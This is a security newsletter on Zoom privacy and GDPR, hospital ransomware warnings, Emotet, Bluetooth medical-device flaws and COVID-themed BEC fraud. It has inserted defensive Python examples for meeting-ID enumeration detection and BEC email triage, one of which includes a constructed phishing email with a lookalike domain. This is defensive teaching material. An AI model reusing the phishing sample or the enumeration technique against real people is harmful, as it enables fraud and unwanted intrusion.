Avantia Threat Update

ZOOM’S SECURITY & PRIVACY VIOLATED


Zoom's Security and Privacy Woes just keep coming.

This Past Week: Zoom’s security and privacy woes continue; Microsoft warns hospitals of impending ransomware attacks; Emotet malware shuts down an entire corporate network by overheating PCs (a Microsoft DART case study); Bluetooth-related flaws threaten dozens of medical devices; remote work is not new, but it’s the ‘new normal’; FBI expects an increase in COVID-19-themed BEC scams; ransomware slows COVID-19 treatment development; malware targets online shoppers; phishing scams jump by 667% in a month; and major breaches in the UNITED STATES, UNITED KINGDOM, CANADA & AUSTRALIA.


Dark Web ID Trends:

Top Source Hits: ID Theft Forums

Top Compromise Type: Domain

Top Industry: Medical & Healthcare

Top Employee Count: 11 - 50

________________________________________________________________________


ZOOM’S SECURITY & PRIVACY WOES - EXPERT SAYS:

Home working and learning have led to a boom in videoconferencing, with Zoom a major beneficiary. But concerns over privacy and security raise important questions: is Zoom safe, and is it even GDPR compliant? The General Data Protection Regulation (GDPR) is a legal framework that sets guidelines for the collection and processing of personal information from individuals who live in the European Union (EU). Security concerns revolve around the recent discovery of several vulnerabilities, taken together with the length of time it has taken Zoom to fix earlier vulnerabilities. Privacy concerns focus on a lack of transparency around the user or meeting data retained by Zoom, and who else has access to it. We will concentrate on the privacy issues in this article. Data retention and third-party access concerns are typified by the recent discovery that the Zoom iOS app had been passing data to Facebook even where the iOS user had no Facebook account. There was no indication in Zoom's privacy policy that this was happening (Zoom has stopped this, but iOS users need to update to the latest app version for the change to take effect). There are two concerns here: the lack of transparency and the distribution of information to a third party without user consent. "This is a clear breach of GDPR," Tara Taubman-Bassirian, a French-born, London-based lawyer and privacy advocate, told SecurityWeek. "With the lack of transparency, the host holds many capabilities that are unknown to the participant, such as recording and further broadcasting." The consent issue is a complex one, which will require careful consideration by Zoom if it is to be solved. GDPR holds that consent for collecting personal data must be freely given, and that if there is an imbalance of power between the parties, it cannot be a free choice and any consent obtained is invalid. There is already a precedent for this. 
In September 2019, a school in Sweden was fined $20,000 for using facial biometrics to track 22 students. The parents had given their consent, but the data protection regulator ruled, "consent was not a valid legal basis given the clear imbalance between the data subject [the students] and the controller [the school]." There is the potential for this same argument to be used in the current work from home environment, for both office workers and schoolchildren. Any invitation to a teleconference is effectively an instruction with an imbalance of power and little realistic option to decline. It is possible that many COVID-19 instigated teleconferences are being held in contravention of GDPR's consent rules. Zoom describes itself as the data processor rather than the data controller (which is the host). If this argument is supported by the GDPR data regulators, and the meeting hosts keep a recording of the meeting on their own servers, it means that the host is responsible for the data under GDPR.  This is an important aspect that might not be recognized by the hosts. Valid consent becomes even more important, and it should, suggests Taubman-Bassirian, "be of the higher standard as data collected and recorded are biometrics capable of identifying individuals" -- and in some cases will include children. Zoom appears to be making efforts to solve the issues that have been raised over the last few weeks. In a blog published Wednesday, it says, "We are looking into each and every one of them and addressing them as expeditiously as we can. We are committed to learning from them and doing better in the future." One immediately welcome statement is "we do not sell our users' data, we have never sold user data in the past, and have no intention of selling users' data going forward." The blog explains the pressure the company is under. 
Where last year the maximum number of daily meeting participants was around 10 million, it is now more than 200 million, which now includes 90,000 schools across 20 countries. But the issues pre-exist the current surge in use -- they have not been created by the expansion. Zoom further explains that the platform was designed for business users, and the influx of home workers and schoolchildren has been a surprise. But the need for privacy and security does not differentiate between corporations, individual workers at home, and schoolchildren -- so neither of these arguments has any bearing on the current issues. Indeed, they rather raise another question, since they indicate a lack of privacy by design or default -- which is a requirement under GDPR. One of the improvements Zoom is working on is to improve its transparency and clarity. It has admitted, in a separate blog, that what it marketed as end-to-end encryption of its services is no such thing. Jarosław Kamiński, principal consultant at F-Secure, explains the relevance. The encryption Zoom uses means that communication between the Zoom server and the participant is encrypted in transit and not susceptible to a man-in-the-middle attack on that link; the server itself, however, handles the content in the clear. "E2E," he continued, "means the communication is encrypted for the whole time and is inaccessible to the vendor. Without end-to-end encryption, a vendor has the technical capability to intercept / record the communication." That doesn't mean the vendor does this; but Zoom doesn't specify that it doesn't. Zoom is also introducing a new transparency report. This is very welcome. The firm says it is, "Preparing a transparency report that details information related to requests for data, records, or content." Notice the word 'content'. An updated privacy policy issued on March 27 makes it clear that the Zoom cloud will contain recordings of all meetings that the host wishes to be recorded -- so Zoom will always have access to some meetings' content. 
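Kamiński's distinction between transport encryption and end-to-end encryption is easiest to see with both designs side by side. The block below is an added example, not code from the article, from F-Secure or from Zoom, and it says nothing about how Zoom's servers are actually built: it models a relay that holds each client's transport key (a stand-in for TLS) and records whatever it can see under that layer, then sends the same message with and without a meeting key that only the two participants hold. The cipher is a deliberately toy HMAC-based keystream so the model runs with the standard library only; it is not a real cipher and the key sharing step for the meeting key is simply assumed.

```python
import hashlib
import hmac
import os


def keystream_xor(key, nonce, data):
    """Toy stream cipher used only to make the model concrete (not for real use):
    XOR `data` with successive HMAC-SHA256(key, nonce || counter) blocks.
    Encryption and decryption are the same operation."""
    out = bytearray()
    for i in range(0, len(data), 32):
        block = hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
        out.extend(b ^ k for b, k in zip(data[i:i + 32], block))
    return bytes(out)


class Relay:
    """The vendor's server. It holds each client's transport key (the TLS stand-in)
    and keeps a copy of whatever it can see under that layer, as any vendor could."""

    def __init__(self):
        self.transport_keys = {}
        self.recorded = []

    def register(self, client_id, transport_key):
        self.transport_keys[client_id] = transport_key

    def forward(self, sender, receiver, nonce, wire):
        inner = keystream_xor(self.transport_keys[sender], nonce, wire)   # strip sender's transport layer
        self.recorded.append(inner)                                        # server-side "recording"
        return keystream_xor(self.transport_keys[receiver], nonce, inner)  # re-wrap for the receiver


def run_meeting(use_e2e, message=b"cabinet minutes: not for the vendor"):
    """Send one message from alice to bob through the relay.
    Returns (what bob decrypted, what the relay was able to record)."""
    relay = Relay()
    ka, kb = os.urandom(32), os.urandom(32)          # per-client transport keys, known to the relay
    relay.register("alice", ka)
    relay.register("bob", kb)
    meeting_key = os.urandom(32) if use_e2e else None  # shared by alice and bob only, never by the relay
    nonce = os.urandom(8)

    payload = keystream_xor(meeting_key, nonce, message) if use_e2e else message
    wire = keystream_xor(ka, nonce, payload)            # transport encryption, alice -> relay
    delivered = relay.forward("alice", "bob", nonce, wire)
    received = keystream_xor(kb, nonce, delivered)      # transport decryption, relay -> bob
    plaintext = keystream_xor(meeting_key, nonce, received) if use_e2e else received
    return plaintext, relay.recorded[0]


if __name__ == "__main__":
    for mode in (False, True):
        got, seen = run_meeting(mode)
        print("E2E" if mode else "transport-only",
              "| bob received:", got, "| relay recorded plaintext:", seen == got)
```

In the transport-only run the relay's recording equals the plaintext; in the E2E run bob still reads the message but the relay holds only ciphertext. That difference, not the presence of TLS, is what a transparency report about "content" requests turns on.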
What it doesn't say is that it does not store any other meetings' content. We know that since it does not use end-to-end encryption, it can intercept and store everything. We don't know whether it does, nor how long it retains the content it says it stores. This raises another question, since Zoom says clearly that it obeys national laws for government access to content. But Zoom is global in operation, which means that via the CLOUD Act, the U.S. government can demand access to foreign data. This is worth considering, since apart from possibly sensitive commercial information, that content might even include confidential foreign government data.  On March 27, UK Prime Minister Boris Johnson tweeted that he had just, hours earlier, "chaired the first ever digital Cabinet". The screenshot he shared makes it clear it was held on Zoom, and even shows the Zoom meeting ID number. Disclosing the ID number is not as concerning here as it might immediately appear, because the meeting had finished and there was no chance for 'zoombombing' by third parties.  F-Secure senior researcher Andy Patel explained 'zoombombing'. "A Zoom meeting ID is a relatively short numerical string that can likely be guessed or brute forced. By constructing a URL to potential meetings (by synthesizing the URL -- usually just the Zoom URL, possibly expanded with the customer name, with the ID appended), someone can find and join meetings that aren't password protected, even if they weren't invited," he told SecurityWeek. "As an extra bonus, some people have been posting screenshots from their Zoom meetings that include the ID, so when people find those, they all pile into the open meeting." However, in our current example, we do not know whether the host (either Boris Johnson or the Cabinet Office) asked for a copy to be kept by Zoom for future reference, or whether Zoom kept a copy by default. In either case, US intelligence agencies could now demand access to everything said within the meeting. 
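Patel's description above is an enumeration attack against a short numeric identifier space, and the defensive counterpart is noticing it on the service side. The block below is an added example, not code from the article, from F-Secure or from Zoom: it runs a sliding-window check over constructed join-attempt log lines (the log format, field names and thresholds are assumptions, as is the sample traffic) and flags a source that tries many distinct meeting IDs with mostly "not found" results, the pattern a meeting-ID scanner leaves and a legitimate participant does not.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log lines (not real traffic). Assumed format:
# <ISO timestamp> <source ip> join <meeting_id> <result>
SAMPLE_LOG = """\
2020-04-06T09:00:01 203.0.113.7 join 123456789 not_found
2020-04-06T09:00:02 203.0.113.7 join 123456790 not_found
2020-04-06T09:00:02 203.0.113.7 join 123456791 not_found
2020-04-06T09:00:03 203.0.113.7 join 123456792 password_required
2020-04-06T09:00:03 203.0.113.7 join 123456793 not_found
2020-04-06T09:00:04 203.0.113.7 join 123456794 not_found
2020-04-06T09:00:04 203.0.113.7 join 123456795 not_found
2020-04-06T09:00:05 203.0.113.7 join 123456796 joined
2020-04-06T09:00:10 198.51.100.4 join 555000111 joined
2020-04-06T09:01:00 198.51.100.4 join 555000111 joined
2020-04-06T09:02:00 198.51.100.9 join 555000111 not_found
2020-04-06T09:02:30 198.51.100.9 join 555000111 joined
"""


def parse_line(line):
    """Split one log line into (timestamp, source, meeting_id, result)."""
    ts, src, _verb, meeting_id, result = line.split()
    return datetime.fromisoformat(ts), src, meeting_id, result


def find_enumerators(log_text, window=timedelta(seconds=60), min_distinct=5, min_miss_ratio=0.6):
    """Return {source: (distinct_ids, not_found_count)} for every source that,
    within any `window`, tried at least `min_distinct` different meeting IDs and
    received not_found for at least `min_miss_ratio` of its attempts.
    A real user retries one ID; a scanner walks through many."""
    per_src = defaultdict(deque)
    flagged = {}
    for line in log_text.splitlines():
        ts, src, meeting_id, result = parse_line(line)
        attempts = per_src[src]
        attempts.append((ts, meeting_id, result))
        while attempts and ts - attempts[0][0] > window:   # drop attempts outside the window
            attempts.popleft()
        distinct = {m for _, m, _ in attempts}
        misses = sum(1 for _, _, r in attempts if r == "not_found")
        if len(distinct) >= min_distinct and misses / len(attempts) >= min_miss_ratio:
            flagged[src] = (len(distinct), misses)
    return flagged


if __name__ == "__main__":
    for src, (ids, misses) in find_enumerators(SAMPLE_LOG).items():
        print(f"{src}: {ids} distinct meeting IDs, {misses} not_found within the window")
```

The thresholds are deliberately low for the constructed sample; in production they are tuned against normal join behaviour, and the same signal is the argument for passcodes and waiting rooms, so that a guessed ID on its own does not admit a stranger.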
It would be natural to expect that the UK's cyber guardians -- in particular, the Cabinet Office and the NCSC -- would have ensured Zoom's privacy and security before allowing the prime minister to go digital. SecurityWeek asked both offices for clarification, but got none. The Cabinet Office did not answer our questions, but provided two unrelated comments: "National Cyber Security Centre guidance shows there is no security reason for Zoom not to be used for meetings of this kind." It also said, "The MoD [referring to false reports that the MoD had banned the use of Zoom] uses Zoom to conduct cross-government meetings for official level business. There are no plans to review this." The implication is that the NCSC has examined Zoom and found it adequate. This doesn't seem likely, since the only comment provided by the NCSC, so far, firmly passes the buck back to the Cabinet Office: "Cabinet Office are leading the response on Zoom, so for a statement I'd recommend getting in touch with press office via [their email address]." Whether the NCSC has conducted its own tests on Zoom or not, there nevertheless seem to be enough privacy issues (past and present) to wonder whether Zoom is adequately GDPR (or the UK's Data Protection Act implementation of GDPR) compliant. Here SecurityWeek asked the Information Commissioner's Office for a comment. The reply was this: "The coronavirus pandemic has led to a rise in use of video conferencing tools as a valuable way for people to communicate. Any such technology must be transparent with users about how their data will be processed, as well as giving users choice and control. At this stage we are considering various concerns that have been raised regarding video conferencing apps." There is no specific reference to Zoom, but we can assume that it is high on the list of videoconferencing tools being considered. Other European data protection regulators are likely to be doing similar. 
On the surface it would appear that Zoom has a case to answer -- but Zoom hosts must also consider their own exposure as data controllers -- especially regarding the valid consent issue. Whether Zoom should be investigated -- or even fined if found to be in violation -- is a different question. "It is my opinion," Brittany Roush, Director at the Crypsis Group, told SecurityWeek, "that having that kind of flexibility to ensure that critical services can carry on, especially in a crisis, does not take the teeth from the CCPA and GDPR. If anything, it demonstrates that the regulatory bodies are carrying out their essential function -- which is to ensure that companies protect consumer data... In many ways, the CCPA and GDPR should take a page from HIPAA, which lowered security standards for Telehealth in order to manage the critical healthcare demands of the pandemic... we do not have the luxury of time on our side to devise perfect solutions."


MICROSOFT WARNS HOSPITALS OF IMPENDING RANSOMWARE ATTACKS

Microsoft this week sent targeted warnings to dozens of hospitals that it believes are vulnerable to impending ransomware attacks. On April 1, Microsoft's Threat Protection Intelligence Team published the blog titled, 'Microsoft works with healthcare organizations to protect from popular ransomware during COVID-19 crisis: Here's what to do,' which states that Microsoft threat intelligence sources "identified several dozens of hospitals with vulnerable gateway and VPN appliances in their infrastructure." Microsoft said it sent "a first-of-its-kind targeted notification" to the hospitals about their vulnerable gateway and VPN deployments, warning them that ransomware threat actors are currently scanning the internet for such vulnerabilities. While there's been an increase in social engineering attacks amid the COVID-19 pandemic, Microsoft said it's seen evidence of more sophisticated and dangerous threat activity, which could put hospitals and healthcare organizations in jeopardy at a critical time. "We're seeing not just a rise in COVID-themed typical phishing/malware lure emails, but an uptick in the attempted compromise of legitimate services, such as healthcare and technology providers. Attackers are masquerading as these trusted entities using their services as a relay to get to users. Some of them are more sophisticated operations impersonating an individual/organization in need for several days," a Microsoft spokesperson said. "We have seen attackers with many motivations utilize these human-operated ransomware style vulnerabilities, including to target hospitals." According to the Microsoft Threat Protection Intelligence blog titled 'Human-operated ransomware attacks: A preventable disaster,' these types of attack "are known to take advantage of network configuration weaknesses and vulnerable services to deploy devastating ransomware payloads." 
"In these hands-on keyboard attacks, which are different from auto-spreading ransomware like WannaCry or NotPetya, adversaries employ credential theft and lateral movement methods traditionally associated with targeted attacks like those from nation-state actors. They exhibit extensive knowledge of systems administration and common network security misconfigurations, perform thorough reconnaissance and adapt to what they discover in a compromised network," the blog post said. One adversary known to exploit gateway and VPN vulnerabilities is the ransomware group, REvil, also known as Sodinokibi. Microsoft has been tracking the group as part of a broader monitoring of human-operated ransomware attacks. "As organizations have shifted to remote work in light of the pandemic, we're seeing from signals in Microsoft Threat Protection Services (Microsoft Defender ATP, Office 365 ATP and Azure ATP) that the attackers behind the REvil ransomware are actively scanning the internet for vulnerable systems," Microsoft Threat Protection Team wrote in the blog. "Our intel on ransomware campaigns shows an overlap between the malware infrastructure that REvil was observed using last year and the infrastructure used on more recent VPN attacks. This indicates an ongoing trend among attackers to repurpose old tactics, techniques and procedures for new attacks that take advantage of the current crisis." According to the blog, once REvil is successful with an exploitation, "attackers steal credentials, elevate their privileges and move laterally across compromised networks to ensure persistence before installing ransomware or other malware payloads." Emsisoft threat analyst Brett Callow provided SearchSecurity with information that showed a healthcare organization was recently attacked by REvil; several ransomware groups recently pledged not to attack healthcare and medical facilities during the pandemic, though REvil was not one of those groups. 
REvil employs human-operated attack methods to target organizations that are most vulnerable to disruption, ones that haven't had the time or resources to install the latest patches or update firewalls, according to Microsoft. Threat actors can remain undetected in networks, sometimes for months on end. "We recommend to hospitals that they prioritize patching any open VPN and gateway vulnerabilities, as attackers are actively taking advantage of them as people work and access information remotely," a Microsoft spokesperson said. Since the release of the blog on April 1, Microsoft said it has received replies from healthcare organizations asking for additional information and resources.


EMOTET MALWARE SHUT DOWN AN ENTIRE CORPORATE NETWORK BY OVERHEATING PCs (MICROSOFT DART CASE STUDY)

Emotet is one of the most notorious malware families wreaking havoc across industries. In a case study published by Microsoft's Detection and Response Team (DART), it took down an entire corporate network by overheating computers. The victim, which Microsoft refers to by the alias "Fabrikam" in the case study, was a customer organization, not Microsoft itself. According to the DART report, Emotet tricked one Fabrikam employee into opening a malicious email attachment. The series of events that followed led to a week-long shutdown of the organization’s core services as the malware maxed out CPUs. How was the attack executed? Emotet evaded the existing detection systems, helped by being regularly updated and controlled from the attackers’ command-and-control (C2) server. Five days after the employee’s credentials were captured through the phishing attachment, the Emotet payload was delivered and executed on Fabrikam’s PCs. Soon the operators began targeting more Fabrikam employees and their external contacts using the stolen credentials, and more systems were infected. The malware gained control of the entire network after obtaining access to an administrator account. Within eight days of the attachment first being opened, the entire network had crashed despite the best efforts of the organization’s IT department. Every PC connected to the network began overheating, freezing, and shutting down or rebooting with Blue Screen of Death errors. Emotet also consumed all available bandwidth, crippling the network’s internet connection. DART’s case study notes: “When the last of their machines overheated, Fabrikam knew the problem had officially spun out of control. We want to stop this hemorrhaging.” The entire network, including the 185-camera surveillance system, was brought to its knees. “Emotet consumed the network’s bandwidth until using it for anything became practically impossible. Even emails couldn’t wriggle through,” reads the report. 
Containment Efforts: Eight days after the first system froze, Microsoft’s DART team was called in to Fabrikam. They contained the attack by creating buffer zones that isolated assets with admin privileges, uploaded new antivirus signatures, and deployed Microsoft Defender ATP and Azure ATP to eradicate the malware completely. Microsoft’s recommendations from the case are to deploy email filtering to block phishing attachments before they reach users, and to require multi-factor authentication so that stolen passwords alone cannot be reused to access the network.


BLUETOOTH RELATED FLAWS THREATEN DOZENS OF MEDICAL DEVICES

Hundreds of smart devices—including pacemakers—are exposed thanks to a series of vulnerabilities in Bluetooth Low Energy implementations. Bluetooth is used in everything from speakers to implanted pacemakers, which means that Bluetooth-related vulnerabilities can affect a dizzying array of devices. In the latest instance, a newly discovered round of 12 Bluetooth bugs potentially exposes more than 480 devices to attack, including fitness trackers, smart locks, and dozens of medical tools and implants. Researchers from the Singapore University of Technology and Design began developing techniques for analyzing Wi-Fi security in January 2019, and later realized they could apply those same methods to assess Bluetooth as well. By September they had found their first bug in certain implementations of Bluetooth Low Energy, the version of the protocol designed for devices with limited resources and power. Within weeks, they had found 11 more. Collectively dubbed "SweynTooth," the flaws exist not in BLE itself, but in the BLE software development kits that ship with seven "system on a chip" products—microchips that integrate all of a computer's components in one place. IoT manufacturers often turn to off-the-shelf SoCs to develop new products quickly. That also means, though, that SoC implementation flaws can propagate across a wide variety of devices. The SweynTooth bugs can't be exploited over the internet, but an attacker within radio range could launch attacks to crash targeted devices entirely, disable their BLE connection until a restart, or in some cases even bypass BLE's secure pairing mode to take them over. In addition to all manner of smart home and enterprise devices, the list includes pacemakers, blood glucose monitors, and more. As problematic as the vulnerabilities could be in smart home devices or office equipment, the stakes are clearly higher in the medical context. 
The researchers did not develop proof of concept attacks against any of the potentially vulnerable medical devices, but the relevant SoCs contain bugs that could be used to crash the communication functions or the whole device. Manufacturers will need to individually test each of their products that rely on a vulnerable SoC to determine which attacks would be feasible in practice and what patches are necessary. And the researchers note that it's important for manufacturers to consider how an attacker could chain the SweynTooth vulnerabilities with other possible remote access attacks to cause even greater harm. Any device that wants to advertise Bluetooth as a feature and use the Bluetooth logo goes through a certification process to ensure interoperability across devices. In this case, though, the SoC manufacturers missed some basic security red flags. "We were quite surprised to find these kinds of really bad issues in prominent vendors," says Sudipta Chattopadhyay, an embedded systems researcher who oversaw the work. "We developed a system that found these bugs automatically. With a little bit more security testing they could have found it as well." The Bluetooth Special Interest Group, which oversees development of the Bluetooth and BLE standards, did not return a request from WIRED for comment about the findings. Bluetooth and BLE implementation issues are common, though, partly because the Bluetooth and BLE standards are massive and complex. "Some of the vendors we contacted originally, the engineers said, 'Well, the reason you're getting these issues is that you're putting in values that are not expected, not within the specification,'" Chattopadhyay says. "But you can't only be testing for a benign environment. We're talking about an attacker here. He doesn’t care about what's expected." The researchers notified seven SoC makers about the vulnerabilities. Texas Instruments, NXP, Cypress, and Telink Semiconductor have all released patches already. 
Dialog Semiconductor has released updates for one of its SoC models, with more coming for other models in a few weeks. STMicroelectronics recently confirmed the researchers' findings but has not developed patches yet, and Microchip does not currently seem to have patches in the works. Even when the SoC vendors release updates to their BLE software development kits to plug the holes, though, the challenge is that each individual manufacturer that uses any of the seven affected SoCs still needs to take those patches, adapt them to their particular products, and convince customers to install them.

"Imagine the time it takes for a single pacemaker to get an update and the kind of process to update it in the field," says Ben Seri, who has found similar chip-level BLE implementation issues and is vice president of research at the embedded device security firm Armis. "It’s not something that happens quickly or easily. For all of these affected devices, they either won't be patched at all or will require huge effort to be updated.” The researchers emphasize that even more products than the hundreds they've already identified are likely vulnerable, because it's difficult to know where manufacturers have used impacted SoCs. Now that the SweynTooth findings are public, it's possible that more vulnerable SoCs will come to light as well as the Singapore University of Technology and Design group and other researchers around the world continue investigating. "The FDA is assessing the SweynTooth Bluetooth Low Energy chipset vulnerabilities," an agency spokesperson told WIRED. "The FDA continues to assess new information concerning emergent cybersecurity vulnerabilities and will keep the public informed if significant new information becomes available." The vulnerabilities are difficult to exploit in practice, and expose different devices to different degrees. But they underscore just how critical chip-level security is, especially when those chips are broadly outsourced—not to mention how long it takes to fix these problems when they arise in IoT.


REMOTE WORK IS NOT NEW, BUT IT’S THE NEW NORMAL:

Due to Coronavirus (COVID-19) outbreak, we have seen a huge shift with many people who typically spend 40 or more hours a week in the office now working from home and having to adjust in an accelerated timeframe. We’ve seen plenty of articles sharing advice on how you can be effective working at home and the like, but what experienced remote workers – and often the authors of these pieces – forget is that this is uncharted territory for most. Being forced to work from home without advanced notice to properly prepare can be a real challenge. To put it simply, this new norm is disruptive. The challenge now is that 50 percent or more of us are spending the whole week at home – and online. This is putting additional pressure on corporate IT and the IT teams who need to scale up services fast are working harder than ever to ensure a good user experience. Here are a few simple suggestions that may help during this time of change.

Stay off the (corporate) network

When we work from home, most of us will use a VPN (Virtual Private Network). It makes our work computer behave as if we are in the office, saves on extra authentication and, in some cases, is the only way to access corporate information. However, a VPN is also a chokepoint into the network and too many users can slow down access. It’s likely that some software like email does not require a VPN and other applications may be accessible externally with additional authentication or using a multi-factor token. As a reminder, in most organisations, the VPN is designed to protect access to business services. General online activities, such as banking and social media, are not affected. If your corporate policy allows it, don’t automatically load the VPN when you start work – use it when needed and unload when you don’t.

Working at home carries additional (online) risks

In the office, we are protected by a corporate security bubble – our employers invest heavily to ensure that the right solutions are in place to protect data and keep threats on the outside. As home workers, our corporate device will still carry a level of protection, but the risks are heightened by the environment. For this reason, security awareness is an important consideration. A corporate awareness program provides much needed information for workers. Beyond being part of an employee on-boarding process, this program should be continually updated and mandated with refresher training. One simple suggestion that goes beyond a program is to provide regular mini updates on what’s happening in the world of SCAMS and malware. This keeps employees up-to-date and, in return, they are more likely to share with friends, family and contacts, if the information is presented in an informative and easily digestible way. The onus is also on us to take extra responsibility applying corporate awareness to our own environments. There are plenty of distractions when working from home; children, deliveries, a sunny patio or a walk with the dog at lunchtime. The bad guys know this and will have malware targeted toward broadband connections, looking for remote workers on their home network.


• Watch for SCAM text messages with seemingly helpful links to more information. If you were not expecting the message and do not recognize the number, never click on the link.

• Keep a watchful eye on phishing and SPAM emails. Even something that appears to come from someone you know could be a fake. If you’re unsure about an email, take a look at this recent article on spotting phishing attacks. 


Learning from Experience 

People who work remotely are less visible with colleagues and management, often leading them to overwork. This is a common mistake and can lead to burn out or reduced overall quality of work. Our working habits certainly change when we’re away from the office, but this can be for the better. Here are a few tips for those working from home.


1. We are often more productive at home. Think about the distractions of a day in the office: coffee machine chats, smoke breaks, shuffling from room to room for meetings, etc. How much time do these activities take when added up? Your working day should reflect a day in the office, don’t be chained to the desk…exercise, make coffee and enjoy the experience.

2. When setting up conference calls for a remote audience, try not to put them to the top of the hour. That’s when everyone does it, making it more likely to cause issues with connectivity. Rather than a 10:00 a.m. call, try 10:15 and schedule it for 45 minutes rather than an hour. This accounts for what would be the walking time between meeting rooms and will give you a small break.

3. Have a non-work chat. This is so important. In the office, we regularly take time to chat with a colleague about their evening or maybe plans for the weekend – why not do the same from home, but with a 15-minute video catch up? You’d be surprised what a lift it can give to your well-being and mood.


Working remotely should be a positive experience. You may be able to get more done in a day (work-related and not) and, by avoiding the daily commute, will end the day in a much better frame of mind. We’re all in the same boat for the foreseeable future – we can make the most of it by understanding the risks and giving everyone (including ourselves) a little grace.


FBI EXPECTS INCREASE IN COVID-19 THEMED BEC SCAMS

The Federal Bureau of Investigation is expecting an increase in the frequency of scams related to the current COVID-19 pandemic, including those involving Business Email Compromise (BEC). BEC scams are a type of fraud that targets the people in charge of an organisation’s finances, or who routinely order legitimate funds transfers to customers and suppliers, and tricks them into sending money to accounts the attackers control. In BEC attacks, the victim typically receives an email apparently arriving from a company they normally conduct business with, requesting that payments be made to a new account, or demanding a change in the standard payment operations. According to the FBI, losses in the USA surpassed $1.7 billion in 2019, and are only expected to increase. More recently, there has been an increase in BEC attacks targeting municipalities purchasing personal protective equipment or other supplies for the ongoing coronavirus crisis. One of the most recent examples of BEC fraud targeted a financial institution with an email allegedly arriving from the CEO of a company and related to a previously scheduled transfer of $1 million. The message requested that the transfer date be moved up and the funds sent to a new account, due to the COVID-19 situation. In another incident, a bank customer received a message from an alleged client in China, requesting that all invoice payments be changed to a different bank, claiming that their regular accounts could not be accessed due to audits. Several transfers were made to the new bank before the fraud was discovered. To stay protected from this type of fraud, organizations should look for specific red flags, including an unexplained urgency, last minute changes in wire details or in established communication platforms, refusal to communicate via telephone or online voice/video services, requests for advance payment of services where such payment was not previously required, and requests to change direct deposit information. 
According to the FBI, being skeptical of any last minute changes in wiring instructions and verifying all such changes via the contact on file could help avoid falling victim to fraud. To stay protected, users should also make sure that URLs in emails are associated with the business they claim to be from, should be wary of hyperlinks that may contain misspellings of the actual domain name, and should verify the email address used to send emails. Immediately after discovering that they might have fallen victim to a fraudulent incident, users should contact their financial institution to request a recall of funds, and should also report the issue to the employer. Victims are advised to also file a complaint with the FBI’s Internet Crime Complaint Center or the equivalent in their country as soon as possible.
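As an added example (not from the FBI advisory or the original article), the following Python script applies those red flags to a raw email message: it compares the sender's domain and any linked hosts against a list of vendor domains on file to catch misspelt lookalikes and "vendor.com.evil" style prefixes, flags a Reply-To address that points somewhere other than the sender's domain, and searches the subject and body for urgency, bank-detail changes and excuses for avoiding a phone call. The vendor domains, the two sample messages and the keyword patterns are all constructed for illustration.

```python
"""Added example: triage an inbound email for the BEC red flags the FBI lists."""
import re
from email import message_from_string
from email.utils import parseaddr

# Vendor domains on file. Constructed for this example; not a real supplier list.
VENDOR_DOMAINS = {"acme-supplies.com", "northwind-traders.co"}

URGENCY = re.compile(r"\b(urgent(ly)?|immediately|asap|today|right away|moved? up)\b", re.I)
BANK_CHANGE = re.compile(
    r"\b(new|different) (bank )?account\b"
    r"|\b(updated?|changed?|new) (bank|wire|payment|remittance|direct deposit) (details|instructions|information)\b"
    r"|\bchange (of|to|in) (bank|wire|direct deposit)\b", re.I)
NO_CALL = re.compile(
    r"\b(cannot|can'?t|unable to) (take|answer|receive|get on) (a |the |any )?(call|phone)\b"
    r"|\bdo not (call|phone)\b|\baudits?\b", re.I)
URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def edit_distance(a, b):
    """Plain Levenshtein distance; small enough to inline rather than import."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def lookalike_of(domain, known=VENDOR_DOMAINS):
    """Return the vendor domain that `domain` imitates, or None if it is genuine or unrelated.
    Catches one- or two-character typosquats and 'vendor.com.evil.net' style prefixes."""
    domain = domain.lower().rstrip(".")
    if domain in known:
        return None
    for k in known:
        if domain.endswith("." + k):
            return None  # genuine subdomain, e.g. mail.acme-supplies.com
        if domain.startswith(k + ".") or edit_distance(domain, k) <= 2:
            return k
    return None


def _text(part):
    payload = part.get_payload(decode=True)
    return payload.decode(part.get_content_charset() or "utf-8", "replace") if payload else ""


def bec_red_flags(raw_email):
    """Parse an RFC 822 message and return the list of red flags it trips."""
    msg = message_from_string(raw_email)
    flags = []
    sender = parseaddr(msg.get("From", ""))[1]
    reply_to = parseaddr(msg.get("Reply-To", ""))[1]
    sender_domain = sender.rsplit("@", 1)[-1].lower() if "@" in sender else ""
    reply_domain = reply_to.rsplit("@", 1)[-1].lower() if "@" in reply_to else ""

    imitated = lookalike_of(sender_domain)
    if imitated:
        flags.append(f"sender domain {sender_domain} imitates {imitated}")
    if reply_domain and reply_domain != sender_domain:
        flags.append(f"Reply-To domain {reply_domain} differs from From domain {sender_domain}")

    body = "\n".join(_text(p) for p in msg.walk() if p.get_content_type() == "text/plain")
    text = msg.get("Subject", "") + "\n" + body
    if BANK_CHANGE.search(text):
        flags.append("requests a change of bank/wire details")
    if URGENCY.search(text):
        flags.append("unexplained urgency")
    if NO_CALL.search(text):
        flags.append("discourages voice verification")
    for host in URL_RE.findall(text):
        imitated = lookalike_of(host)
        if imitated:
            flags.append(f"link host {host} imitates {imitated}")
    return flags


# Constructed sample messages: one modelled on the invoice-redirection pattern, one benign.
SAMPLE = """\
From: "Dana Reyes" <dana.reyes@acme-suppIies.com>
Reply-To: dana.reyes@mail-acme.net
To: ap@example-co.test
Subject: Re: Invoice 4471 - updated remittance details

Hi, because of the COVID-19 situation our regular account is under audit.
Please send today's payment to the new bank account below, it is urgent.
I cannot take a call this week. Confirm via https://acme-suppIies.com/portal
"""

CLEAN = """\
From: billing@acme-supplies.com
To: ap@example-co.test
Subject: Invoice 4472

Attached is this month's invoice, payable to the account on file. Thanks.
"""

if __name__ == "__main__":
    for name, raw in (("SAMPLE", SAMPLE), ("CLEAN", CLEAN)):
        print(name, bec_red_flags(raw))
```

Keyword patterns of this kind are a triage aid, not a verdict: a genuine supplier can change bank accounts, and a careful attacker can avoid every word on the list. The control that actually stops the loss is the out-of-band call to the number already on file, which no email scanner replaces.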

______________________________________________________________________________


THREAT FOCUS: Social Bluebook - UNITED STATES

https://techcrunch.com/2020/03/27/social-bluebook-hacked/


Exploit: Unauthorized database access 

Social Bluebook: Social media platform  

